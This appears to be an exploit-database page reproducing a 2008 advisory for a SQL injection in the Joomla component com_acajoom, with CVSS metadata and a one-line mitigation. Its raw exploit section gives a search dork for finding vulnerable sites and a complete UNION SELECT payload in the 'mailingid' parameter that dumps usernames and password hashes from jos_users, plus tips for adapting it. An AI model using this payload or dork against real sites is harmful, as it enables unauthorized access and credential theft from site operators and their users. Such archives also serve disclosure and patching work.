header-logo
Suggest Exploit
vendor:
Acajoom
by:
fataku
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Acajoom
Affected Version From: 1.1.2005
Affected Version To: 1.1.2005
Patch Exists: YES
Related CWE: N/A
CPE: a:joobi:acajoom
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Joomla Component com_acajoom SQL Injection

A vulnerability in the Joomla component com_acajoom allows an attacker to inject arbitrary SQL commands. This is done by manipulating the 'mailingid' parameter in a 'view' action to the 'com_acajoom' component. This can be exploited to bypass authentication and gain access to the Joomla backend with administrative privileges.

Mitigation:

Upgrade to the latest version of the component.
Source

Exploit-DB raw data:

###############################################
#
# Joomla Component com_acajoom SQL Injection
#
###############################################
#
# Author: fataku
#
# Mail    : fataku@gmail.com
#
###############################################
#
# Dorks 1 : inurl:"com_acajoom" mailingid
#
###############################################
#
# Sploit:
#
# index.php?option=com_acajoom&act=mailing&task=view&listid=1&Itemid=1&mailingid=1/**/union/**/select/**/1,1,1,1,concat(username,0x3a,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/from/**/jos_users/**/LIMIT/**/1,1/*
#
###############################################
#
# Note/Tip:
#
# jos_ prefix may need fixed
#
# it may differ the number id, try LIMIT/**/1,1/* instaed
#
###############################################
#
# Greetings:
#
# To all the guys at www.offensive-security.com
#
###############################################

side note:

	<name>Acajoom</name>
	<creationDate>January 2007</creationDate>
	<author>Joobi Ltd</author>
	<authorName>JoobiWeb</authorName>
	<copyright>© 2006-2007 Joobi Ltd. All Rights Reserved.</copyright>

	<license>http://www.acajoom.com/license.php</license>
	<authorEmail>support@acajoom.com</authorEmail>
	<authorUrl>www.joobiweb.com</authorUrl>
	<version>1.1.5</version>
	<description>Acajoom is a mailing lists, newsletters, auto-responders, and follow up tool to communication effectively with your users and customers.
	Your Communication partner!</description>

# milw0rm.com [2008-03-18]

Navigation

Suggest Exploit

Services By CQR